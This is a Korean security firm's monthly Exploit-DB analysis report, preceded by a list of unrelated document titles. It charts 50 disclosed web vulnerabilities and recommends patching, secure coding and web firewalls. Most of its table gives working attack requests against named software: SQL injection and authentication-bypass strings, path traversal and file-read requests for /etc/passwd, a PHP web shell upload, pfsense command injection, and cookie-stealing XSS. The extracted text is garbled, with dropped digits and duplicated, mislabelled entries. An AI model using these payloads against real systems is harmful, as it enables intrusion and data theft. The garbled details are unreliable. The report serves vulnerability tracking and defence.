EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

Similar documents
EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

76 XSS 하 Huge-IT Slider admin.php XSS

EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

3장

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

Secure Programming Lecture1 : Introduction

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

제목 레이아웃

(주)나우프로필의 이동형 대표 개편의 방향이 시민참여를 많이 하는 방향이라, 홈페이지 시안 이 매우 간편해져서 소통이 쉬워질 것 같다. 다만 웹보다 모바일 이용자가 지속적으로 급증하는 추세이므로 이에 적합한 구조가 되도록 보장해야 한다. 소셜미디어전략연구소 배운철 대표

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

PCServerMgmt7

08SW

Orcad Capture 9.x

FileMaker 15 WebDirect 설명서

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

vm-웨어-01장

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras

6강.hwp

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

Ç¥Áö

DocsPin_Korean.pages

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

PowerPoint 프레젠테이션

Portal_9iAS.ppt [읽기 전용]

UNIST_교원 홈페이지 관리자_Manual_V1.0

초보자를 위한 ASP.NET 2.0

?

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

untitled

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

Remote UI Guide

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

Data Industry White Paper

105È£4fš

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

Interstage5 SOAP서비스 설정 가이드

특허청구의 범위 청구항 1 디바이스가 어플리케이션을 실행하는 방법에 있어서, 상기 디바이스에 연결된 제1 외부 디바이스와 함께 상기 어플리케이션을 실행하는 단계; 상기 어플리케이션의 실행 중에 제2 외부 디바이스를 통신 연결하는 단계; 및 상기 제1 외부 디바이스 및

특허청구의 범위 청구항 1 몸체(110)의 일측에는 테스트의 필요성에 따라 여타한 디젤 자동차(100)에서 분리시킨 상태의 분리형 커먼레일 인젝트(110)를 고정할 수 있는 분리형 인젝터 고정부(20)가 구비되고, 그 고정부(20)의 하측에는 분리형 커먼 레일 인젝터(

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

thesis

목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항

12¿ù 1~30

PowerPoint


chapter1,2.doc

ODS-FM1

歯sql_tuning2

cam_IG.book

BH의 아이폰 추천 어플

untitled

VOL /2 Technical SmartPlant Materials - Document Management SmartPlant Materials에서 기본적인 Document를 관리하고자 할 때 필요한 세팅, 파일 업로드 방법 그리고 Path Type인 Ph

Sena Device Server Serial/IP TM Version

<4D F736F F D205B4354BDC9C3FEB8AEC6F7C6AE5D3131C8A35FC5ACB6F3BFECB5E520C4C4C7BBC6C320B1E2BCFA20B5BFC7E2>

초보자를 위한 ADO 21일 완성

LCD Display

Connection 8 22 UniSQLConnection / / 9 3 UniSQL OID SET

4? [The Fourth Industrial Revolution] IT :,,,. : (AI), ,, 2, 4 3, : 4 3.

<B1DDC0B6C1A4BAB8C8ADC1D6BFE4B5BFC7E C8A3292E687770>

3ÆÄÆ®-14

NATE CP 컨텐츠 개발규격서_V4.4_1.doc

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

CD-RW_Advanced.PDF

BEef 사용법.pages

nTOP CP 컨텐츠 개발규격서_V4.1_.doc

컴퓨터과학과 교육목표 컴퓨터과학과의 컴퓨터과학 프로그램은 해당분야 에서 학문적 기술을 창의적으로 연구하고 산업적 기술을 주도적으로 개발하는 우수한 인력을 양성 함과 동시에 직업적 도덕적 책임의식을 갖는 IT인 육성을 교육목표로 한다. 1. 전공 기본 지식을 체계적으로

Windows Live Hotmail Custom Domains Korea

2006_8_14 (8_17 updated) ms ¿ú(wgareg.exe) ºÐ¼® º¸°í¼�.hwp

PowerPoint 프레젠테이션

PowerPoint Template

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

Observational Determinism for Concurrent Program Security

<B8DEC0CFC0BBC5EBC7D1C0FCC0DABCBCB1DDB0E8BBEABCADC0AFC5EBB0B3B9DFC1F6C4A776312E302E687770>

C++Builder ADO Programming (5) - ADO Transaction, Errors

I 안전 지침 다음 안전 지침을 이용해 사용자 자신과 북톱(Booktop)를 보호하십 시오. M1022 북톱(Booktop) 컴퓨터를 사용할 때 주의: 휴대용 컴퓨터를 신체 위에 직접 올려놓고 장시간 동 안 사용하지 마십시오. 장시간 작동으로 인해 컴퓨터 밑부 분에서

3월 한달 간, 씨앤앰 VOD [지상파 3사 통합월정액] 상품을 리모콘으로 가입하신 고객님 모두에게 VOD 1만원 쿠폰 을 드립니다! 씨앤앰 [지상파3사 통합월정액]이란? 지상파 3사 VOD 무제한 시청! 단 한번 가입으로 지상파 3사의 모든 드라마, 예능 프로그램을

Network seminar.key

PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (

미래 서비스를 위한 스마트 클라우드 모델 수동적으로 웹에 접속을 해야만 요구에 맞는 서비스를 받을 수 있었다. 수동적인 아닌 사용자의 상황에 필요한 정보를 지능적으로 파악 하여 그에 맞는 적합한 서비스 를 제공할 수 새로운 연구 개발이 요구 되고 있다. 이를 위하여,

CONTENTS Volume 테마 즐겨찾기 빅데이터의 현주소 진일보하는 공개 기술, 빅데이터 새 시대를 열다 12 테마 활동 빅데이터 플랫폼 기술의 현황 빅데이터, 하둡 품고 병렬처리 가속화 16 테마 더하기 국내 빅데이터 산 학 연 관

슬라이드 1

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper

PowerPoint 프레젠테이션

AGENDA 모바일 산업의 환경변화 모바일 클라우드 서비스의 등장 모바일 클라우드 서비스 융합사례

1217 WebTrafMon II

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

Backup Exec

Transcription:

EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 208 년 월 EDB 분석보고서에공개된취약점은모두 50 개입니다. 이가장많은수의취약점이공개된공격은 SQL Injection 입니다. 특히공격난이도와위험도가모두 ' ' 인공격또한 SQL Injection 입니다. 모두 ' ' 인 SQL Injection 케이스 "Advantech WebAccess < 8.3 " 취약점은 URL 경로간에공격코드가삽입되는특이한취약점입니다. 해당취약점을포함여 EDB 분석보고서에공개된취약점에대해예방기위해서최신패치와시큐어코딩을권장합니다. 지만완벽한시큐어코딩은불가능며, 지속적으로보안성을유지기위해서웹방화벽을활용한심층방어 (Defense indepth) 구현을고려해야합니다.. 취약점별보고개수 취약점 보고개수 File Upload 2 Command Injection 3 5 XSS 8 SQL Injection 32 60 50 40 30 취약점별보고개수 32 50 총합계 50 20 0 0 8 5 2 3 File Upload Command Injection XSS SQL Injection 총합계 2. 위험도별분류 위험도 보고개수 백분율 37 74.00% 3 6.00% 위험도별분류 0 20.00% 총합계 50 00.00% 0 3. 공격난이도별현황 공격난이도 보고개수 백분율 3 6.00% 3 62.00% 6 32.00% 총합계 50 00.00% 3 37 4. 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 4 CentOS Web 3 2 Local 2 PACSOne Server 2 Easy Car 204 Joomla! Component Picture Calendar for Joomla Quickad Gespage EMC xpression Worpress Service Finder Booking Zechat Photos in Wifi LearnDash Smart Google Code Inserter Muviko Buddy Zone Events Calendar Joomla! Component Visual Calendar Shopware LiveCRM SaaS Cloud SAP NetWeaver J2EE Engine Affiligator Xnami Wchat pfsense Tumder ImgHosting Flexible Poll Domains & Hostings Manager Learning Management System RISE Task Rabbit Clone ILIAS Multilanguage Real Estate MLM Flash Operator Advantech WebAccess Zomato Clone Joomla! Component CP Event Calendar Reservo Image Hosting Hot s Clone SugarCRM 총합계 50 공격난이도별현황 3 6 3 주요소프트웨어별취약점발생현황 4 3 2 2 2 CentOS Web Local PACSOne Server Easy Car 204 Joomla! Component Picture Calendar for Joomla Quickad Gespage EMC xpression

EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 208-0-03 43420 SQL Injection Smart Google Code Inserter < 3.5 POST /wp-admin/options-general.php?page=smartcode HTTP/. POST /wp-admin/options-general.php?page=smartcode HTTP/. action=saveadwords&delconf=&oid[]= OR =-- &ppccap[]=ex:mywplead&ppcpageid[]=&ppccode[]=bb&nchkdel=o n Smart Smart Google Code Google Code Inserter Inserter < 3.5 208-0-03 43422 SQL Injection EMC xpression 4.5SP Patch 3 - 'model.jobhistoryid' SQL Injection /xdashboard/html/jobhistory/jobdochistorylist.action?model. jobhistoryid=736687378927029792022348433 and =2 EMC xpression EMC xpression 4.5SP Patch 3 POST /gespage/webapp/users/prnow.jsp HTTP/. 208-0-05 43447 SQL Injection Gespage 7.4.8 show_prn=');select PG_SLEEP(3)-- POST /ges/webapp/users/blhistory.jsp HTTP/. Gespage Gespage 7.4.8 show_month=');select PG_SLEEP(3)-- 208-0-08 43457 Photos in Wifi.0. - Path /asset.php?id=40c9c332-857b-4cb8-b848-59a30aa9cf3b&ext=[../not_allowed_directory/].[ext] Photos in Wifi Photos in Wifi.0. POST / HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd0029908f2 208-0-08 4346 File Upload LearnDash 2.5.3 - Arbitrary File Upload -----------------------------7dd0029908f2 Content-Disposition: form-data; name="uploadfiles[]"; filename="@./shell.php.php Content-Type: application/octet-stream <?php echo exec("ls -la /etc/passwd"); -----------------------------7dd0029908f2-- Content-Disposition: form-data; name="post" LearnDash LearnDash 2.5.3 foobar -----------------------------7dd0029908f2-- Content-Disposition: form-data; name="course_id" foobar -----------------------------7dd0029908f2-- Content-Disposition: form-data; name="course_id" foobar -----------------------------7dd0029908f2-- 208-0-08 43844 SQL Injection < 6.7.2-3429 POST /photo/include/blog/label.php HTTP/. < 6.7.2-3429 action=get_article_label&article_id=; SELECT version(); -- 208-0-08 43844 < 6.7.2-3429 POST /photo/include/file_upload.php?dir=2f2e2e2f406707073746f72 652f50686f7 HTTP/. < 6.7.2-3429 action=aviary_add&url=file:///etc/passwd 208-0-0 43475 Worpress Service Finder Booking < 3.2 - Local File Disclosure /wp-content/plugins/sfbooking/lib/downloads.php?file=/etc/passwd Worpress Service Finder Booking Worpress Service Finder Booking < 3.2

EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. POST /login.php HTTP/. 208-0-0 43477 SQL Injection Muviko. email=admin@dmin.com'%2b(select*from(select(sleep(20)))a)%2 b'&password=admxn&login= Muviko Muviko. 추가적인참고정보 # SQL Injection: load_season.php form parameter [GET] season_id # SQL Injection get_raring.php parameter [GET] movie_id # SQL Injection update_rating.php parameters [GET] rating,movie_id # SQL Injection set_player_source.php parameters [GET] id 208-0-0 43479 SQL Injection Events Calendar - 'event_id' SQL Injection /event.php?event_id=- 23%20union%20all%20select%20,2,@@version,4,5,6,7,8,9,0, Events Calendar,2,3,4,5,6,7,8,9,20,2,22,23,24,25,26,27,28,29-- Events Calendar POST /UDDISecurityService/UDDISecurityImplBean HTTP/. 208-0-0 43495 SQL Injection SAP NetWeaver J2EE Engine 7.40 <soapenv:envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sec="http://sap.com/esi/uddi/ejb/security/"> <soapenv:header/> <soapenv:body> <sec:deletepermissionbyid> <permissionid>' AND =(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-52%') AND ''='</permissionid> </sec:deletepermissionbyid> </soapenv:body> </soapenv:envelope> SAP NetWeaver J2EE Engine SAP NetWeaver J2EE Engine 7.40 208-0-2 43535 XSS Xnami.0 - Cross -Site ing POST /media/ajax HTTP/. Xnami Xnami.0 method=addcomment&comment="><iframe SRC=# onmouseover="alert(document.cookie)"></iframe>&mediaid=6 208-0-5 43560 Command Injection pfsense < 2..4 - 'status_rrd_graph_img.php' Command Injection /status_rrd_graph_img.php?database=queues;+printf+'ls - al'+'sh' pfsense pfsense < 2..4 208-0-5 43567 XSS ImgHosting.5 /?search="><script>confirm(document.domain)<%2fscript> ImgHosting ImgHosting.5 208-0-5 43569 SQL Injection Domains & Hostings Manager PRO 3.0 - Authentication Bypass POST /dhrpro_demo/login.php HTTP/. Domains & Hostings Manager Domains & Hostings Manager PRO 3.0 accusername=admin%27+or+%27%27%3d%27&accuserpassword=admi n%27+or+%27%27%3d%27&login=+enter+ 208-0-5 4359 SQL Injection RISE.9 - 'search' SQL Injection POST /index.php/knowledge_base/get_article_suggestion/ HTTP/. RISE RISE.9 search=product'%20and%20(select*from(select(sleep(20)))a)-- %20 208-0-5 43595 208-0-5 43600 Command Injection Command Injection ILIAS < 5.2.4 Flash Operator 2.3.03 - Command Execution /setup/setup.php?cmd="><script>alert()</script> /ucp/index.php?quietmode=337&module=callforward&command=./ &ls -al ILIAS Flash Operator ILIAS < 5.2.4 Flash Operator 2.3.03 POST /demo/foodpanda/myacount.php HTTP/. User-Agent: Mozilla/5.0 (Windows NT 0.0; Win64; x64; rv:57.0) Gecko/20000 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q =0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Content-Disposition: form-data; name="fname" Content-Disposition: form-data; name="lname" Content-Disposition: form-data; name="email" @.com Content-Disposition: form-data; name="phone" 23 Content-Disposition: form-data; name="image"; filename="info.php.jpg" (change extension to.php) Content-Type: image/jpeg

EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 208-0-5 43667 File Upload Zomato Clone - Arbitrary File Upload <?php phpinfo();?> Content-Disposition: form-data; name="addr" Zomato Clone Zomato Clone Content-Disposition: form-data; name="addr2" Content-Disposition: form-data; name="post" Content-Disposition: form-data; name="country" Content-Disposition: form-data; name="state" 3945 Content-Disposition: form-data; name="city" 635 Content-Disposition: form-data; name="location" Content-Disposition: form-data; name="update" Upload -- 208-0-7 43676 XSS Reservo Image Hosting.5 /search/?s=image&t=%27%29%3b%2522%2520style%253d%22%3cscrip t%3ealert%28%29%3c%2fscript%3e%3c Reservo Image Hosting Reservo Image Hosting.5 208-0-7 43683 XSS SugarCRM 3.5. /index.php?action=login&module=users&print=a&"/><script>ale rt('xss')</script> SugarCRM SugarCRM 3.5. /index.php?action=login&module=users&print=a&"/><script>ale rt('xss')</script> POST /backend/customer/ HTTP/. 208-0-2 43849 XSS Shopware 5.2.5/5.3 {"id":22,"groupkey":"ek","email":"test@test.de","active":tr ue,"accountmode":0,"confirmationkey": "","paymentid":5,"firstlogin":"206-08- 8T00:00:00","lastLogin":"206-08- 8T7:22:23","newsletter":0,"validation":0," languageid":,"shopid":,"pricegroupid":0, "internalcomment":"testcomment","failedlogins":0,"referer":"","default_billing_add ress_id":22," default_shipping_address_id":22, "newpassword":"","amount":402.9,"ordercount":,"canceledord eramount": 0,"shopName":"Hauptshop Deutsch","language":"Deutsch","birthday":"6.05.985","titl e":""," salutation":"mr","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <"," Shopware Shopware 5.2.5/5.3 lastname":"test[injected SCRIPT CODE]>"<iframe "number":"20028","billing":[{"id":22,"salutation":"mr","com pany":""," department":"","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert (document.cookie) <","title":"","lastname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",,"additionaladdressline":"","additionaladdressline2":"", "salutationsnippet":"herr","countryid":2,"number":"","phone ":"","vat Id":"","stateId":null}],"shipping":[{"id":23,"salutation":" mr","company":"","department":"", "firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <","title":"", "lastname":"test[injected SCRIPT CODE]>"<iframe,"additionalAddressLine":"", "additionaladdressline2":"","salutationsnippet":"herr","cou ntryid":2,"stateid":null}],"debit": [],"paymentdata":[{"accountnumber":"","bankcode":"","bankna me":"","accountholder":"","bic":"", "iban":"","usebillingdata":false,"id":null}]} /index.php?action=login&module=users&print=a&"/><script>ale rt('xss')</script> POST /backend/customer/ HTTP/.

EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 208-0-2 43850 XSS CentOS Web 0.9.8.2 {"id":22,"groupkey":"ek","email":"test@test.de","active":tr ue,"accountmode":0,"confirmationkey": "","paymentid":5,"firstlogin":"206-08- 8T00:00:00","lastLogin":"206-08- 8T7:22:23","newsletter":0,"validation":0," languageid":,"shopid":,"pricegroupid":0, "internalcomment":"testcomment","failedlogins":0,"referer":"","default_billing_add ress_id":22," default_shipping_address_id":22, "newpassword":"","amount":402.9,"ordercount":,"canceledord eramount": 0,"shopName":"Hauptshop Deutsch","language":"Deutsch","birthday":"6.05.985","titl e":""," salutation":"mr","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <"," lastname":"test[injected SCRIPT CODE]>"<iframe "number":"20028","billing":[{"id":22,"salutation":"mr","com pany":""," CentOS Web CentOS Web 0.9.8.2 department":"","firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert (document.cookie) <","title":"","lastname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <",,"additionaladdressline":"","additionaladdressline2":"", "salutationsnippet":"herr","countryid":2,"number":"","phone ":"","vat Id":"","stateId":null}],"shipping":[{"id":23,"salutation":" mr","company":"","department":"", "firstname":"test[injected SCRIPT CODE]>"<iframe src=./evi.source onload=alert(document.cookie) <","title":"", "lastname":"test[injected SCRIPT CODE]>"<iframe,"additionalAddressLine":"", "additionaladdressline2":"","salutationsnippet":"herr","cou ntryid":2,"stateid":null}],"debit": [],"paymentdata":[{"accountnumber":"","bankcode":"","bankna me":"","accountholder":"","bic":"", "iban":"","usebillingdata":false,"id":null}]} 208-0-2 43850 XSS CentOS Web 0.9.8.2 POST /index.php?module=mail_add-new HTTP/. CentOS Web CentOS Web 0.9.8.2 ifpost=yes&email_address="><iframe SRC=# onmouseover="alert(document.cookie)"></iframe>&domain=domain.com&password="><iframe SRC=# onmouseover="alert(document.cookie)"></iframe> 208-0-23 43855 XSS CentOS Web 0.9.8.2 - 'row_id' / 'domain' SQL Injection POST /index.php?module=list_domains HTTP/. CentOS Web CentOS Web 0.9.8.2 ifpost=yes&username=&domain=' or =--&row_id=' or =- - 208-0-23 43860 SQL Injection LiveCRM SaaS Cloud.0 /livecrm/web/index.php?r=site/login&company_id=%3%20%4f%52 %20%3%20%47%52%4f%55%50%20%42%59%20%43%4f%4e%43%4%54%5f%5 7%53%28%30%78%33%6%2c%56%45%52%53%49%4f%4e%28%29%2c%46%4c% 4f%4f%52%28%52%4%4e%44%28%30%29%2a%32%29%29%20%48%4%56%49 %4e%47%20%4d%49%4e%28%30%29%20%4f%52%20%3 LiveCRM SaaS Cloud LiveCRM SaaS Cloud.0 208-0-23 4386 SQL Injection Affiligator 2..0 /search/?q=&price_type=range&price=%3%30%30%20%6%6e%64%28 %73%65%6c%65%63%74%2%56%65%72%4%79%6%72%69%2d%7e%30%2e%2 0%66%72%6f%6d%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20% 67%72%6f%75%70%5f%63%6f%6e%63%6%74%28%56%65%72%73%69%6f%6e %28%29%29%29%79%29%78%29 Affiligator Affiligator 2..0 208-0-23 43863 SQL Injection Easy Car 204 /site_search.php?s_vehicletype=auto&s_order=[sql]&s_row=%35 %3%20%2f%2a%2%30%35%35%35%35%50%72%6f%63%65%64%75%72%65%2 a%2f%20%2f%2a%2%30%35%35%35%35%4%6e%6%6c%79%73%65%2a%2f% 20%28%65%78%74%72%6%63%74%76%6%6c%75%65%28%30%2c%2f%2a%2 %30%35%35%35%35%63%6f%6e%63%6%74%2a%2f%28%30%78%32%37%2c%3 0%78%33%6%2c%40%40%76%65%72%73%69%6f%6e%2c%64%6%74%6%62% 6%73%65%28%29%29%29%2c%30%29%2d%2d%20%2d Easy Car 204 Easy Car 204 208-0-23 43864 SQL Injection Wchat.5 POST /login.php HTTP/. Wchat Wchat.5 User=' UNION ALL SELECT 0x3,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x33,0 x34--& Pass=anything 208-0-23 43865 SQL Injection Zechat.5 POST /login.php HTTP/. Zechat Zechat.5 User=' UNION ALL SELECT 0x3,0x32,0x33,concat(0x63)--& Pass=anything

EDB 분석보고서 (208.0) 208.0.0~208.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 208-0-23 43866 SQL Injection Tumder 2. /category/%2d%33%20%20%2f%2a%2%30%3%3%3%3%55%4e%49%4f% 4e%2a%2f%20%2f%2a%2%30%3%3%3%3%4%4c%4c%2a%2f%20%2f%2a %2%30%3%3%3%3%53%45%4c%45%43%54%2a%2f%20%30%78%33%3%2 c%30%78%33%32%2c%43%4f%4e%43%4%54%28%44%6%74%6%62%6%73% 65%28%29%2c%56%45%52%53%49%4f%4e%28%29%2c%30%78%37%65%2c%44 %4%54%4%42%4%53%45%28%29%2c%30%78%37%65%2c%55%53%45%52%2 8%29%29%2d%2d%20%2d Tumder Tumder 2. 208-0-23 43868 SQL Injection Quickad 4.0 /listing?keywords=' UNION ALL SELECT NULL,CONCAT(version(),0x7e7e,database()),NULL-- gllf&location=all%20united%20states&placetype=country&place id=23[sql]&cat=[sql]&subcat=5[sql]&filter=&sort=newest&sub mit= Quickad Quickad 4.0 208-0-23 43869 SQL Injection Flexible Poll.2 /mobile_preview.php?id=- 74'+UniOn+SElecT+(/*!08888Select*/+export_set(5,@:=0,(/*!0 8888select*/+count(*)/*!08888from*/(information_schema.colu mns)where@:=export_set(5,export_set(5,@,/*!08888table_name* /,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),2,3,4,5-- Flexible Poll Flexible Poll.2 208-0-23 43870 SQL Injection Local.0 /sellers_subcategories.php?industryid=- 05++/*!08888uNiOn*/(/*!08888SelECt*/+0x307832383333239,0x 283229,0x283329,0x283429,(/*!08888Select*/+export_set(5,@:= 0,(/*!08888select*/+count(*)/*!08888from*/(information_sche ma.columns)where@:=export_set(5,export_set(5,@,/*!08888tabl e_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2) ),0x283629,0x283729)-- Local Local.0 208-0-24 43870 SQL Injection Local.0 /suppliers.php?industryid=[sql]&categoryid=- 05++/*!08888uNiOn*/(/*!08888SelECt*/+0x307832383333239,0x 283229,0x283329,0x283429,(/*!08888Select*/+export_set(5,@:= 0,(/*!08888select*/+count(*)/*!08888from*/(information_sche ma.columns)where@:=export_set(5,export_set(5,@,/*!08888tabl e_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2) ),0x283629,0x283729)-- Local Local.0 208-0-26 4390 SQL Injection Learning Management System - 'course_id' SQL Injection /?type=scoring-status-student&course_id=- 999999+union+select+,2,3,user()%23 Learning Management System Learning Management System 208-0-28 43907 PACSOne Server 6.6.2 DICOM Web Viewer - Trasversal /pacs/nocache.php?path=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.i ni /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..% 2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd PACSOne Server PACSOne Server 6.6.2 DICOM Web Viewer 208-0-28 43908 SQL Injection PACSOne Server 6.6.2 DICOM Web Viewer POST /pacs/usersignup.php HTTP/. hostname=localhost&database=dicom&username=- 999999+union+select+,2,3,user()%23&password=22222222&first name=&lastname=&email=- 999999+union+select+,2,3,user()%23&action=Sign+Up PACSOne Server PACSOne Server 6.6.2 DICOM Web Viewer 208-0-28 4394 SQL Injection Task Rabbit Clone.0 - 'id' SQL Injection /pages/single_blog.php?id=%3%20%20%2f%2a%2%3%33%33%33%37 %55%4e%49%4f%4e%2a%2f%20%2f%2a%2%3%33%33%33%37%53%45%4c%4 Task Rabbit Clone 5%43%54%2a%2f%20%3%2c%76%65%72%73%69%6f%6e%28%29%2c%33%2c% 34%2c%35%2c%36%2d%2d%20%2d Task Rabbit Clone.0 208-0-28 4395 SQL Injection.0 POST /index.php HTTP/..0 User=' OR -- -&Pass=bypass 208-0-28 4395 SQL Injection.0 /site.php?id=%2d%33%36%34%27%20%20%2f%2a%2%30%38%38%38%38% 55%4e%49%4f%4e%2a%2f%28%2f%2a%2%30%38%38%38%38%53%45%4c%45 %43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33%3%3 3%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%2%30%38%38% 38%38%43%4f%4e%43%4%54%5f%57%53%2a%2f%28%30%78%32%30%33%6 %32%30%2c%55%53%45%52%28%29%2c%44%4%54%4%42%4%53%45%28%2 9%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38%35% 33%34%3%34%65%32%30%35%33%34%35%34%65%34%33%34%3%34%65%2c 